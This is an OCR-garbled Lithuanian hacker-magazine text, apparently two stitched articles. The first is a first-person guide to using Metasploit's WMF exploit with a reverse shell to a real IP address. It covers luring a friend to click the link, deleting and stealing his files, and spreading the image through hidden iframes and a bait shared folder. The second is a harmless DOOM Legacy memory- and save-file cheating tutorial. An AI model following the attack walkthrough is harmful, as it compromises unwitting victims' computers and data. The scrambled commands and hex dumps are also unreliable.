AŠ PAPASAKOSIU APIE TAI, KAIP TIN- 
KLO ATMATOS, NIEKŠAI IR BJAURYBĖS 
PRAKTIŠKAI IŠNAUDOJA ŠĮ KENKSMINGĄ 
EKSPLOITĄ. 


(Tu jau supratai?] Tai žinoma, kad supratai. Kalbu 
apie tas pačias WMF bylų apdorojimo klaidas, kurioms 
paskirtas šiame numeryje publikuojamas didelis Kriso 
Kasperskio straipsnis. Ten Krisas pasakoja apie klaidos 
atsiradimo istoriją, parodo, kaip ją dauginimuisi išnaudoja 
kirminai ir kaip veikia visi jo išbandyti eksploitai. Tačiau vis- 
kas, apie ką jis ten kalba, pateikiama iš rimtos sisteminės 
pusės. Mūsų tikslas šiandien — išsiaiškinti, kaip tinklo 
niekšai praktiškai išnaudoja internete pateiktus eksploitus. 
Pasakysiu dar daugiau: aš pats priklausau šiems tinklo 
parazitams ir todėl viską dėstysiu pirmu asmeniu. Šiandien 
aš papasakosiu apie tai, kaip aš linksminausi ir pokštavau 
Su savo draugais. 


SOFTWARE 


IMPLANT 


HACK 


SCENA 


UNIXOID 


CODING 


[Visų pirma] Ką reikia pirmiausia padaryti? Teisingai: iš 
pradžių reikia iš vienos iš daugelio svetainių, kuriose jis 
pateiktas, parsisiųsti eksploitą. Aš pasinaudojau šia nuor- 
oda: www.securitylab.ru/poc/extra/243579.php. Jeigu 
tu tingi šią nuorodą kopijuoti iš žurnalo, gali pasinaudoti 
securitylab'o svetainėje prieinama paieška arba tiesiog 
eksploito išeities tekstą pasiimti iš disko. Nepamiršk, kad 
Jį naudodamas už viską atsakai tu pats. 


UNITS 


Po pirmo žvilgsnio į eksploitą nepasišventusiam žmogui iškyla 
daugybė klausimų. Iš tiesų, ką reiškia eksploito pradžioje pateiktos 
eilutės? 


package: Msf::Exploif::ie xp pfv metofile; 
uso sic; 


Kažkas nesuprantamo. Greita programos apžiūra Įeidžia manyti, 
Jog tai Perl skriptas. Tačiau kodėl jame nėra pažįstamos eilutės, 
Kurioje nurodomas kelias iki interpretatoriaus? Čia kažkas ne taip. 
Ir iš tiesų, norint visame tame susigaudyti, reikia suprasti eksploito 
antraštėje pateiktą anglišką tekstą: „Ši byla — Metasploit Frame- 
work dalis ir gali būti platinama taip, kaip tau norisi; paskutinę 
Framework versiją galima parsisiųsti iš ww. metasploit.com“. Šis 
sakinys greičiausiai privertė tave dar labiau susimąstyti. Jeigu taip, 
tai tau būtų naudinga daugiau sužinoti apie Metasploit Framework. 
Paskaityti apie šį ambicingą projektą gali atitinkamoje iškarpoje. O 
aš savo ruožtu pereinu prie kenksmingosios praktikos :). 


[Piktoji praktika] Metasploit projektas pilnai parašytas su Peri, 
todėl jį vykdyti galima beveik bet kurioje platformoje. Man pato- 
giausia pasinaudoti FreeBSD shellu. 

Parsisiunčiame projektą: 


gel htip://www.metasploii.con/tools/famevork-2.5-snapsho!.tar.g2 
Jį išarchyvuojame: 


tar 32vi framewoik-2.5-snapsho!.lui.gZ 
cd Aamenork-2.5 


Projekto kataloge tu rasi nemažai bylų ir subkatalogų. Katalogas 
su eksploitais pavadintas atitinkamai -— exploits :). Būtent ten guli 
visi prieinami sploitai, kiekvieno jų praplėtimas — „pm. Jeigu tu 
šiame kataloge padarysi Is, tai tarp visų pateiktų eksploitų pamatysi 
vieną pavadinimu ie xp pfv metafile.pm. Tai ir yra tas visraktis, 
apie kurį mes šiandien kalbame. Kaip matai, naujasis eksploitas 
jau užkrautas į bazę ir laukia, kada mes jį panaudosime.. 


[Pradedame nuodijimą]Pagrindinė programa, su kuria aš dirbsiu, 
vadinasi msfconsole. Kaip ir visa kita, ji parašyta su peri. Paleidžiu 
programą: 


/mslconsole 


Prieš mane pasirodo savotiška komandinė eilutė, su kuria tolimes- 
nis bendravimas atrodo taip: 


mst > use ie 1p plv metailo 

msf ie xp ph metafle > sat PAYLOAD win32 ievase 
PAYLDAD -> win32 reveiso 

ms ie xp p metofila(win32 reverse) > 
LOST -> 218.10.30191 

ms ie xp pl. metaflo(uin32 roverse) > 
[] Storting Revese Handler 

[t] Waiting for connections to hitp://0.0.0.0:8080/anything xm! 


si LHOST 218.1030.191 


ergloit 


Pirmojoje eilutėje aš nurodau, kokį eksploitą ruošiuosi naudoti 
— ie xp piv metafile. Po to apibrėžiu, kokį shellkodą aš noriu 


įvykdyti. www. metasploit.com svetainėje pateiktų win32 shellkodų 
bazėje yra galybė shellkodų ir jų aprašymų. Aš naudosiu win32 re- 
verse: shellkodas paleis cmd.exe, prisijungs prie mano serverio 
r per „pypkę“ (pipe) susijungs su Windows komandine aplinka. 
Norėdamas shellkode nurodyti, kur reikia jungtis, aš apibrėžiu 
privalomą parametrą LHOST (218.10.30.191). Čia taip pat galima 
nurodyti ir parametrą LPORT, nurodantį tcp jungties numerį, prie 
kurio jungsis shellkodas. Tačiau mane tenkina ir reikšmė pagal 
nutylėjimą (4321). Derėtų pastebėti, kad pats ie x0 p metafile 
eksploitas gali perimti šiuos grįžtamuosius susijungimus, todėl visai 
nereikia naudotis netcat. 

Po to, kai visi privalomi shellkodo parametrai nurodyti, aš įvedu pačią 
maloniausią pasaulyje komandą exploit. Tada sploitas praneša, jog jis 
paleido lokalų web serverį (per 8080 jungtį) ir laukia, kol kas nors iš jo 
parsisiųs bylą anything.wmf. Kaip tu pameni, 0.0.0.0 adresas parodo tai, 
kad per! skriptas gauna visas sistemoje prieinamas sąsajas. Pavyzdžiui, 
mano atveju nuodingasis web serveris veikė per 218.10.30.191:8080. 
Čia 218.10.30.191 — išorinės tinklo plokštės adresas. Pats metas 
kuriam nors bičiuliui pakišti nuodingąją nuorocą. 


[Pakišam nuorodą] — Girdi, man jau nurovė stogą. Stebėk, kaip 
kieta: http://218.10.30.191/anything.wmf 

Vienos tokios frazės pakaks, kad bičiulis Saulius tuojau pat 
paspaustų ant nuorodos. Kenkėjiškas paveiksliukas bus persiųstas 
į jo mašiną ir atidarytas su standartiniu XP peržiūros įrankiu. Kaip 
tik šiuo metu jo procesorius pradeda vykdyti mano instrukcijas, 
kurios realizuotos shellkode. Pagaliau pirmasis baitas ištrūksta iš 
jo modemo ir skrenda į mano serverį: užmezgamas ryšys su cmd. 
3xe, Ir aš gaunu pilną priėjimą prie jo sistemos. Tiksliau šnekant, 
yra pipe'as su cmd.exe. Galima peržiūrėti, kokios bylos yra 
ant jo darbastalio. Pašalinam visas nereikalingas. Prisijungiame 
prie ftp serverio ir parsisiunčiam įdomesnius dalykus. Galų gale 


į bet kokiems 


štai kaip praktiškai atrodo WMF ekspioito panaudojimas 


prieinamų eksplaitų sąrašas 


ant darbastalio sukuriame 1000 tekstinių bylų, kurių turinys toks: 
„Hello, jaunuoli! Linksmų Joninių! Cha-cha! Sveikinimai Hakeriui 
ponui Dievui ir V.Adamkui!“. 


[Be dėmesio] Pats supranti. jog mūsų pasirinkta taktika — tai 


vienkartinis pokštas draugui. Jeigu nori kažko daugiau, tai reiktų 
veikti ne taip tiesmukiškai. Geras būdas — kenksminga paveikslėlį 
išsaugoti bet kokiame per internetą prieinamame serve! opo 


to į visas įmanomas vietas įterpinėti šį html kodą: 


iframe heighi=0 sic"hitp:/jono serveris. og/uck un! 
Visi šio puslapio su tokiu kodu lankytojai parsisiųs kenksmingą 
paveikslėlį ir įvykdys ten įmontuotą shellkodą, kuris gali daryti 
ką tik nori. Dar viena gera mintis turėtų patikti lokalių tinklų su 
daugybe bendrų resursų vartotojams. Pakanka upload kata 
loge sukurti subkatalogą „fresh porno“, į kurį galima imesti 
10 pornūchos paveikslėlių ir viena mūsiškį, hakerišką. Po kiek 
laiko pamatysi, kaip visi šį katalogą atsidarę vartotojai įvykdys 


tavo shelikodą. 


[„Metasploit“ idėjos] 

Šiaip tai žodis Framework turėjo tave priversti susimąstyti 
apie kažkokią virtualią mašiną, tarpinį baitkodą ir taip toliau. 
Tačiau viskas kur kas paprasčiau. Čia pagrindinė idėja tame, 
kad įvairių klaidų naudojimui ir testavimui racionalu sukurti 
patogų branduolį, prie kurio galima prijungti pačius įvairiausius 
eksploitus. Kadangi eksploito vykdomas shellkodas gali keistis, 
protinga būtų sukurti dažniausiai naudojamų shellkodų bazę. 
Taip pat būtina, kad valdantis branduolys leistų į splojtus įterpti 
įvairius shellkodus. 

Kitaip tariant, Metasploit Framework — tai perl programa, kuri 
leidžia prijungti specialiu formatu parašytus eksploitus ir į juos 
įterpti bet kokį prieinamą shellkodą. Iš viso eksploitų bazėje yra 
daugiau nei šimtas kenksmingų programų, o skirtingų shellkodų 
kiekis kelia įspūdį! 
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Amžinai gyventi neuždrausi 
Kompiuterinių žaidimų nulaužimas 
savomis rankomis 

NEMIRTINGUMAS IR PILNAS ŠAUDMENŲ 
KOMPLEKTAS PRAKTIŠKAI BET KOKIAME 
ŽAIDIME TAI VISIŠKAI NESUDĖTINGA! 
TAU REIKĖS TIK HEX REDAKTORIAUS 
ĮR KELIOLIKOS MINUČIŲ LAISVO LAIKO. 
ŠIANDIEN IŠMUŠĖ VALANDA: AŠ PASI- 
DALINSIU SU TAVIMI SENOVINIAIS 
ALCHEMIKŲ RECEPTAIS, KURIE MUS 
PASIEKĖ NUO ZX-SPECTRUM LAIKŲ IR 
SUKAUPĖ MILŽINIŠKĄ POTENCIALĄ. 


SOFTWARE 


IMPLANT 


HACK 


[Amžinas gyvenimas] Ką gero duoda amžinas gyveni- 
mas? Gerai pagalvojus, nieko! Vien tik nuolatinė įtampa 
r mirtinas nuobodulys. Jokių savižudybių, vien tik nesibai 
giantys šoviniai. Ir širdelė nesuvirpa susidūrus su iš niekur 
ilindusiu monstru kaip tik tuomet, kai šoviniai baigiasi, 
0 gyvybių nė velnio neliko. Nulaužtas žaidimas praranda 
savo žavesį. Tačiau be nulaužimo čia taip pat neapsieisi, 
kadangi jis pats savaime įdomus techniniu požiūriu. 
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[ĮNemirtingumo receptas] Nemirtingumo receptas 
paprastai slypi atminties ląstelės poslinkyje, kurį rei- 
kia nulaužti, į ją įrašant maksimalų gyvybių kiekį arba 
pakeičiant komandą DEC į NOR Kaip megabaitinėje kodo 
ir duomenų košėje surasti šią magišką vietą? Kai kurie 
pasakys: „Paimti disasemblerį ir išanalizuoti programą“, 
tačiau... šiuolaikiniai žaidimai tokie dideli, kad toks būdas 
nė negali būti svarstomas. Tokius gudrius siūlytojus reikia 
siųsti kuo toliau, o mes patys eisime protingesniu keliu 


[Bendra taktika ir strategija] Nesunku suprasti, kad 
šoviniai, gyvybės, artefaktai ir visas kitas šlamštas — tai 
tam tikrose atminties ląstelėse saugomi kintamieji. Kom- 
piuteriui šios ląstelės niekuo nesiskiria nuo daugybės 
kitų, kuriose saugomos monstrų koordinatės, tekstūros 
ir kiti žaidimų pasaulio objektai. Kaip nustatyti, už ką 
atsakinga viena ar kita ląstelė? Paprasčiausia į galvą at- 
einanti mintis — tiesiog metodiškai keisti vieną atminties 
ląstelę po kitos bei stebėti žaidimo reakciją. Žinant tikslų 
gyvybių/šovinių kieki, galima žymiai susiaurinti paieškos 
sritį ir tirti tik tas ląsteles, kuriose saugoma mums reika- 
linga reikšmė. Tačiau derėtų atminti, kad šis skaičiavimas 
gali būti atliekamas tiek į vieną, tiek ir į kitą pusę. Vienas 
programuotojas skaičiuoja gyvybes, kitas — mirtis, o pats 
skaičiavimas gali būti atliekamas tiek nuo vieneto, tiek 
nuo nulio, o kai kuriais atvejais ir nuo -1. Tarkim, kad 
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Pav.1. neapdoroti 


poslinkių transformavimas su irtualius 


mes turim tris gyvybes. Ar tai reiškia, kad kintamasis live count 
būtinai bus lygus trim? Žinoma, kad ne! Jis kuo puikiausiai gal 
būti lygus 2 (žaidimas baigiasi, kai live count < O) arba nuliu 
(žaidimas baigiasi, kai live count > 2). Galimos ir kitos reikšmės. 
Su šoviniais šiuo atžvilgiu viskas kur kas paprasčiau, dažniausiai 
šie duomenys saugomi atmintyje, tačiau surastų neteisinį 
kiekis vis tiek bus labai didelis! Tarkim, mes turime 50 šovinių ir 
programos dump'e ieškome 32h. Tačiau ten tų 32/ visas milijonas! 
Visko nepatikrinsi ir iki sezono pabaigos! Šiuo atveju sprendimo 


esmė — stebėti skirtingų atminties ląstelių pasikeitimus! Ta 
darydami, mes lengvai atskirsim grūdus nuo pelų. Mūsų veiksmų 
planas atrodo štai taip: 

1. pasidarome programos dump'a (| bylą išsaugojame žaidimo 


būseną) 
2. judame neprarasdami gyvybių ir šovinių, po ko padarome dar 
vieną dump'a 

3. vieną kartą iššauname arba prarandame šiek 
padarome dar vieną dump'ą 

4. dar keletą kartų atliekame ankstesnį veiksmą (paprastai pakanka 
trijų dump'ų) 


tiek gyvybių ir 


Pirmojo ir antrojo dump'ų (save'ų) palyginimas atskleidžia daugybę 
skirtumų, kurie parodo monstrų judėjimą ir kitus žaidimų pasaulio 
pasikeitimus. Tačiau pasikeitusiose atminties ląstelėse nėra nei 
šovinių, nei gyvybių — juk šie parametrai nesikeitė! OK, išbraukiame 
pasikeitusias ląsteles iš „įtariamųjų“ sąrašo ir sulyginame antrąjį 
dump'ą su trečiu, ignoruodami p. pasikeitusias ląsteles. Š 
kartą skirtumų bus ne tiek jau daug. Ieškome tų ląstelių, kurių 
pokytis atitinka šūvių ar prarastų gyvybių kiekį. Jeigu tokių ląstelių 
daugiau nei viena, šią operaciją kartojame tris kartus iki tol, ko! 
liks tik viena pasikeitusi |ąstelė arba (kitas variantas) nuoseklia 


Pav.2. sofi-ic2 — pulik 


šovinių atsargų papildymo priemonė 


laužiame visas tinkamas ląsteles ir tikimės, kad anksčiau ar vėliau 
mums vis tiek pasiseks. Kai kuriuose žaidimuose šovinių kiekis 
saugojamas keliuose vienas kitą dubliuojančiuose kintamuosiuose, 
tačiau išjų tik vienas reikšmingas, o likusieji hakerių žargone vadi- 
nami „šešėliais“, kurie atsakingi už, pavyzdžiui, einamos reikšmės 
išvedimą į ekraną. Pakeitus „šešėlinį“ kintamąjį, šovinių/gyvybių 
skaičius dažniausiai lieka nepasikeitęs, o jeigu jis ir pasikeičia, 
ginklas nustoja šaudyti dar prieš pasibaigiant tavo amunicijai, todėl 
tave gali labai greitai užmušti. 
Lyginti galima tiek užfiksuotus veikiančios programos atminties 
dump'us, tiek ir seivus — išsaugotas žaidimo bylas. Žinodami 
reikiamos ląstelės adresą, mes galime paleisti rezidentinę 
programą, kuri čia įrašo maksimalią galimą reikšmę ir, jei būtina, 
kas kelias sekundes arba dažniau ją atnaujina. Taip pat galima 
paleisti soft-ice ir, sukūrus sustojimo tašką, perimti tą kodą, kuris 
su kiekvienu šūviu mažina šovinių kiekį — tada mes galėsime 
nulaužti žaidimą. Tačiau tai reikalauja papildomų pastangų, kas ne 
visada patogu, todėl daugelis hakerių apsiriboja seivų taisymu. Taip 
žaidėjui pateikiamas pilnas amunicijos komplektas ir maksimalus 
gyvybių skaičius, tačiau nėra gaunamas pilnavertis nemirtingumas 
šoviniai ir gyvybės vis tiek mažėja, todėl norint nemirti, reikia 
nuolat jas papildyti. Be to, kai kurie monstrai tave vis tiek gali 
pribaigti su vienintele raketa! 


[Atminties laužimas] Pradėsime nuo atminties dump'ų palygini- 
no. Pasirinkime žaidimą ir pradėkime jo kankinima. Tegu tai bus, 
pavyzdžiui, DOOM Legacy — geriausia klasikinio DOOM jungtis, 
nemokamai platinama kartu su išeities tekstais ir puikiai veikianti 
tiek Linux, tiek ir win32 tipo sistemose (žr. 2 paveikslą). Rašant 
šį straipsnį, paskutinė stabili versija buvo 1.42. Štai tiesioginė 
žaidimo parsiuntimo nuoroda: www.prdownloads.sourceforge. 
net/doomlegacy/legacy142.exe?download. 

Darnių mūsų veiksmų labui rekomenduoju naudoti būtent šią 
versiją, nes priešingu atveju visi poslinkiai nušliauš nežinia kur, 
tačiau jeigu tu jautiesi pakankamai kietas, pabandyk pasiknebinėti 
šviežesnes beta versijas, kurios prieinamos pagrindiniame projekto 
puslapyje. Be DOOM Legacy mums taip pat prireiks originalaus 
D0OM/D00M2 arba HERETIC wad bylų. Manau, kad DOOM tikrai 
turės kiekvienas! Imame bet kokį padorų dumperį, pavyzdžiui, 
PE Tools arba LordPE, surandame procesą Iegacy.exe ir į bylą 
dump 1.exe padarome veikiančio žaidimo dump'ą. Susitarkime, 
kad šiuo metu pas mus yra 50 šovinių. 

Padaręs pirmąjį dump'ą šiek tiek pabėgiok ir padaryk jį dar kartą, 
tik jau į bylą dump 2.exe. Po to vieną kartą iššauk ir padaryk dar 
vieną dump'ą -— dump 3. pašaudyk dar šiek tiek ir vėl padaryk 
dump 4.exe. Po visu šių veiksmų tu turėsi keturias bylas: dump 
1.exe, dump 2.exe su 50 šovinių ir dump 3.exe, dump 3.exe su 
atitinkamai 49 ir 48 šoviniais. Dabar mes turime sulyginti visas ke- 
turias bylas ir surasti tokias ląsteles, kurios sutampa dump 1.exe ir 
dump 2.exe bylose, tačiau skiriasi visose kitose. Šovinių saugojimui 
Skirti kintamieji bus kažkur tarp jų. Šios užduoties sprendimui aš 
parašiau nedidelį įrankį, kurio išeities tekstą ir paruoštą programą 
rasi mūsų diske. Iš disko pasiimk bylą fok.exe ir ją paleisk: fok 
dump 1.exe dump 2.exe dump 3.exe dump 4.exe>0 

Gautas rezultatas (nukreiptas į bylą, kurios pavadinimas „o“) turi 
atrodyti maždaug taip: 


d3 14 
FCh 00h 6Eh 


000CFBA0h: FEh FOh FEh 


00152262h. Alh 60h 00h 
001523E2h: Alh 60h 00h 
00166574h 32h 3lh 30h 
001666B4h 32h 3lh 30h 
00168F28h: 32h 3lh 30h 
00177245h 65h 64h Fh 
00177538h (Ch Ah Frh 
001775ECh: Ch 26h FFh 
00177A10h: 08h 04h Fi 


Čia pateiktas programos atminties dump'ų sulyginimo rezultatas. 
Į akis iš karto krenta keista seka 32h, 31h, 30h, kuri atitinka 
dešimtainius skaičius 50, 49, 48. Juk tai šovinių kiekis! Šis kin- 
tamasis atminties dump'e sutinkamas tris kartus, atitinkamų vietų 
poslinkiai: 00166574h, 001666B4h, 00168F28h. Viena šių vietų 
tikra, visos kitos -— šešėlinės. Kaip surasti reikiamą? Pradžiai neap; 
dorotus (raw) bylos poslinkius transformuokime į virtualius adresus. 
Paprasčiausia tai padaryti su hiew. Užkrauname dumped 1.exe, 
spaudžiam <F5> (goto), įvedame neapdorotą poslinkį 166574 ir 
spaudžiame <enter> — hiew viršutinėje eilutėje tuojau pat parodys 
atitinkamą virtualų adresą (PE.00568574), o baito reikšmė prie 
kursoriaus lygi 32, kas reiškia, kad viskas teisinga! 


ĮGriebiamės derintuvo] 

Užkraunam soft-ice (bandomasis žaisliukas šiuo metu jau turi būti 
užkrautas), spaudžiam <Ctrl-D> ir sukomanduojam „addr lega- 
cy“, priversdami derintuvą persijungti į mums reikalingo proceso 
kontekstą (šiuo atveju tai yra legacy.exe — pagrindinė vykdoma 
žaidimo byla). Įvedame „wd“ (atidarome dump'o langą) ir rašome 
„E 568574“, kur 568574 — virtualus numanomos šovinių kiekio 
atminties ląstelės adresas. Derintuvas dump'e parodo atminties 
turinį. Komanda „e“ leidžia jį redaguoti interaktyviu režimu. Taip 
pat galima parašyti „e 568574 66“, kur 66 — šovinių skaičius 
šešioliktainėje sistemoje. Pakeitę numanomą šovinių kiekio ląstelę, 
išeiname iš derintuvo (<Ctr-D>) ir žiūrime, ar mums pridėjo 
šovinių (kai kuriuose žaidimuose pasikeitimas atvaizduojamas tik 
po kito šūvio). Nė velnio! Šovinių ir toliau mažėja, o priešai jau 
spaudžia, todėl ilgai mes taip neišsilaikysime! Žiauru! Bandome 


Pav.3. šovinių atsarga sėkmingai papildyta! 
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antrąją ląstelę -- 1666B4h, kurios virtualus adresas hiew tvirtinimu 
yra 568684h, tačiau šovinių kiekis kaip ir prieš tai nepasikeičia. O 
trečią kartą mums iš tiesų pasiseka, šovinių padaugėja iki nurodyto 
kiekio. Iš to išplaukia, kad mūsų ieškotas kintamasis yra 168F28h, 
kurio virtualus adresas — 56AF28h. Bet kuriuo metu mes galime 
iškviesti derintuvą, surinkti „addr legacy <enter> e 56AF28 
FF“ ir taip maksimaliai papildyti šovinių atsargą, tačiau nuolat 
landžioti į soft-ice iš tiesų užknisa, o ir ne pas visus jis yra. Mes 
pasielgsime paprasčiau: parašysime programą, kuri veiks foniniu 
režimu ir kas keletą sekundžių arba net kelis kartus per sekundę 
papildys mūsų šovinių atsargą. Tikra „dovanėlė iš aukščiau“! :) 
Programa labai paprasta, jos kodas neviršija keleto eilučių — tuo 
gali lengvai įsitikinti žvilgtelėjęs į atitinkamą iškarpą. Programa 
kaip komandinės eilutės argumentą paima proceso identifikatorių 
PID), kurį galima nustatyti su Windows Task Manager. Mūsų au- 
tomatinio šovinių papildymo priemonė išsijungia išėjus iš žaidimo. 
Ši programa taip pat gali būti panaudota kitiems žaidimams 
nulaužti tereikia pakeisti AMMO ADDR į reikiamos atminties 
ląstelės adresą, AMMO VALUE — į pageidaujamos reikšmės adresą, 0 
AMMO SIZE — į kintamojo dydį. Paleidžiame mūsų įrankį ir nevaikiškai 
Įkrečiame visiems monstrams. Greitai šaudant šovinių skaičius šiek tiek 
sumažėja, tačiau tuojau pat atsistato į pradinę padėtį. Nuostabu! 


[Hakas diske] Žaidimų modifikavimas atmintyje — galingas da 
lykas, tačiau jis neapsaugotas nuo tam tikrų apribojimų. Įvairiais 
protektoriais (pavyzdžiui, starforcė) apsaugotos programos aktyviai 
priešinasi dump'ų darymui, o Linux sistemai skirtų dumperių iš viso 
nėra! Šiais (ir visais kitais) atvejais tenka griebtis alternatyvaus 
metodo — žaidimo būsenos bylų (seivų) taisymo. Taktinė strategija 
atrodo taip: išsaugome saved 1, judame neprarasdami gyvybių 
šovinių) ir išsaugome saved 2, po to vieną kartą iššauname 
prarandame kelis procentus gyvybių) ir išsaugome saved 3. 
Gautas bylas palyginame su mūsų įrankiu fek.exe ir stebime 
skirtumus. Pasirinkę labiausiai tikėtinus „kandidatus“. pataisome 
Juos hex redaktoriuje, žaidime užkrauname pataisytą bylą. Jeigu 
šovinių/gyvybės kiekis nepasikeitė, taisome tolimesnį baitą ir t.t. 
Sugrįžkime prie DOOM'o. Paruošiame tris seivus (doomsavO.dsg, 
doomsav1.dsg ir doomsav2.dsg) ir juos palyginame. Oops! Visų jų 
dydis skiriasi, t.y. jie užima atitinkamai 2440, 2586 ir 2650 baitus. 
Prasti popieriai! Sprendžiant iš visko, seivo struktūra pakankamai 
sudėtinga, todėl paprasčiausias baitų sulyginimas veikiausiai nieko 
neduos, kadangi už šovinių (gyvybių) saugojimą atsakingos ląstelės 
bus saugomos skirtingose vietose (skirsis poslinkiai). Save bylų 
struktūros dešifravimas — sudėtingas, tačiau labai įdomus daly- 
kas, kuris „užkrėtė“ daugybę šviesių protų. Tokiu atveju pagrindiniu 
ginklu tampa intuicija ir nepaprasta „slystanti“ paieška — mes 
turime ieškoti sutampančių (arba tiesiog panašių) fragmentų ir 
priklausomai nuo jų koreguoti poslinkius. Kitaip tariant, doomsavX. 
dsg struktūra yra tokia: iš pradžių eina antraštė, kurioje saugomas 
seivo pavadinimas, žaidimo versija ir visas kitas šlamštas. 


Seivo antraštė 
0000000000: 32 00 F4 77 00 00 00 00 ? 00 00 00 00 00 (0 00 002 iw 
0000000010: 2B 7E 9C F7 00 00 00 00 976 65 72 73 60 GF 6E 20 +-by version 
0000000020: 31 34 32 00 00 00 00 00 ? 61 66 33 32 00 52 37 59 142 af32 RTY 
0000000030: 65 73 00 B3 19 31 00 8F ?29 32 30 00 AB 43 4F 66 es 771 [20 
WCof 
0000000040: 66 00 BE 9F 4E 6F 00 6E ?77 59 65 73 00 C8 37 4E f ?ANo nwWes 
7N 


Pav.4. sinchronizacija FAR'e 


Už antraštės eina kažkoks blokas be jokios sistemos, kuris visada 
prasideda nuo poslinkio 100h: 
0000000100: 34 24 25 37 26 23 32 387 00 00 C8 00 02 00 64 OC 
0000000110; 00 00 80 01 2800 80 01 ? 02 00 28 00 00 00 2C P? 
0000000120: 64 00 00 00 07 00 00 00 00 000000 DC 0501 d» 
0000000130: 00 00 00 04 03 01 00 4C ? 00 20 00 00 00 00 00 00 777 L 


Prie šio be jokios sistemos sudaryto bloko glaudžiasi tam tikra sa 
struktūra su daugybe „?“ simbolių. Jos poslinkis ir dydis nuola 
skirtingi ir varijuoja labai plačiose ribose. Mes dar iome, už 
ką ji atsakinga, tačiau kad ir kas čia bebūtų, lyginti nuo 
bylos, o nuo šios struktūros pradžios: 


0000000140: FF 000001 0101 01007010101 08000: 
0000000150: 0A 000101 01 080001 701010C0001010110777777272 7 
0000000160: 00 01 0101 11 000101 7011200.0101 01 13 00777? 7979 7772 
0000000170: 01 01 011400010101 


150001 4C 01 160001 77772795 1 


Ką reiškia visi tie „?“ simboliai? Ir kaip nustatyti, kur pradžia? Labai 
paprastai! Lygiai taip pat, kaip astronomai nustato kintamuosius ir 
blykčiojančias žvaigždes! Žvaigždėtas dangus nėra pastovus, nes 
kai kurių žvaigždžių spinduliavimas ilgainiui keičiasi. Tačiau kaip 
jas surasti tarp tūkstančių kitų žvaigždžių? Labai paprastai. Vieną 
žvaigždžių nuotrauką projektuojame į sieną. po to ją nuimame 
nuo projektoriaus ir uždedame kitą, padarytą kiek vėliau, ka reikia 
padaryti taip, kad žvaigždės liktų tose pačiose vietose, 0 dabar 
labai greitai vieną po kitos keičiame šias nuotraukas. Keičiant 
nuotraukas žvaigždės pradeda mirgėti! Mes savo ruožtu šia technika 
panaudosime besiskiriančių baitų paieškai! Mums kaip tikriems 
vyrams prireiks tik FAR :) 


Užvedame kursorių ant doomsavO.dsg ir spaudžiam <F3> (view), 
poto— <F4> (hex-mode). Spaudžiame irtaip 
prie kitos bylos (doomsav1.dsg), o tada „kad sugrįžtume 
prie ankstesnės. Šią operaciją pakartojame keleta kartų, kad 
įsitikintume, jog klaustukų rinkiniai pasislinkę per tam tikrą 
atstumą, kadangi jie prasideda nuo skirtingų poslinkių. Spausdami 
<Alt-8> (goto), pakeičiame doomsav1.dsg pradinį poslinkį taip. 


ieškome pasikeitusi 


Pav.5. gyeitai keisdami bylas (su <+>) 


atminties ląsteli 


kad klaustukų kolekcijos nebešokinėtų. Taip mes lyg su oscilo- 
grafu deriname „sinchronizaciją“ arba vieną ant kito uždedame 
du pirštų antspaudus, norėdami juos visiškai sutapatinti. Mano 
atveju skirtumas tarp bazinio klaustukų kolekcijų poslinkio yra 7 
baitai. Tai reiškia, kad norint juos susinchronizuoti, vieną bylą reikia 
peržiūrinėti pradedant poslinkiu FOh, o kitą — pradedant F7h. Ok! 
Klaustukų rinkiniai sutampa, jie visiškai nesiskiria! Už ką jie tada 
atsako? Sugrįžtame į žaidimą ir, nesitraukdami iš savo vietos, 
užmušame vieną monstrą. Išsaugome. Aha! Skirtumų vis dar nėra. 
Tai reiškia, kad klaustukai skirti ne lavonų parodymui. Atkreipk 
dėmesį į tai, kad einant žaidime vis toliau ir toliau, klaustukų 
vis daugėja. Galbūt tie klaustukai yra tavo praeitas žemėlapis? 
Patikrinkime savo hipotezę. Ir iš tikrųjų, tereikia tau įeiti į naują 
sektorių, kaip į seivą pridedama nauja klaustukų porcija. Įdomu, ar 
taip saugomas tik žemėlapis, ar ir durų būsena? Tai galima lengvai 
išsiaiškinti paeksperimentavus! Už klaustukų prasideda visiškai kita 
duomenų struktūra, kurioje iš pirmo žvilgsnio nėra jokio dėsningumo 
Ir kuri siaubingai keičiasi tarp dviejų išsaugojimų. Logiška manyti, 
kad čia sukoncentruoti žaidimo pasaulio objektų aprašymai. Tačiau 
kaip visame tame susigaudyti? 


Žaidimo pasaulio būseną aprašančios struktūros fragmentas 
0000000740: 00 50 05 00 00 30 OE 40 ? FF FF BF 0100 00 00 00 P? 079 27 
0000000750; 03 26 00 00 68 2E F1 00 7 00 00 0800 00 00 08 00 ?8h.e27 
0000000760: 09 00 00 00 30 07 00 00 ? 30 OE 40 FF FF BF 38 03 ? 0+ 070 787 
0000000770: 04 00 00 00 01 00 00 00 ? 00 03 200000 34 2F F17774/e 
0000000780: 00 00 00 08 00 00 00 08 ? 00 OA 00 00 00 EO 06 00727 p? 
0000000780: 00 50 0D 40 FF FF BF 01 ? 00 00 00 00 03 24 04 00 P 7? 257 
00000007A0: 00 30 F1 00 00 00 70 00 ? 00 00 70 00 08 00 00 000epp? 


Atidžiai peržiūrėjus dump'ą, galima aptikti, kad konstanta FFFFh 
sutinkama kur kas dažniau, nei visos kitos. Tai yra bylos struktūros 
perpratimo raktas, tačiau... kur ta spyna, į kurią jį reikia įkišti? 
Žiūrim toliau. Konstantos išsidėsčiusios skirtingu atstumu viena 
nuo kitos, kas liudija, jog mes susidūrėme su kintamo dydžio 
struktūra arba su sąrašu, kuris užbaigiamas su „terminuojančiu“ 
simboliu FFFFh. Jeigu tai struktūra, tuomet kažkur turi būti 
saugojamas baitais, žodžiais arba dvigubais žodžiais išreikštas 
jos dydis. Kaip jį surasti? Paimkime dvi artimiausias konstantas, 
kurių poslinkis yra 748h ir 768h. Nesunku paskaičiuoti, kad jas 
Skiria 23h baitai. Iš to išplaukia, kad struktūros dydis negali būti 
išreiškiamas nei žodžiais, nei dvigubais žodžiais (23A nesidalina iš 
dviejų), o tik baitais. Mūsų konstantų apylinkėse ieškome skaičiaus 
23h. Jo nėra! Dėl to galima manyti, kad FFFFh naudojamas kaip 
užbaigiantis simbolis, pažymintis sąrašo pabaigą. Telieka parašyti 
programą, kuri sąrašų turinį atvaizduotų skaitymui patogiu pavidalu, 
tuomet ieškoti skirtumų bus kur kas paprasčiau. tačiau tai gana 
sudėtinga užduotis, kurios sprendimas reikalauja daug laiko ir 
kantrybės. Tačiau po to mes galėsime „žudyti“ bet kokius monstrus 
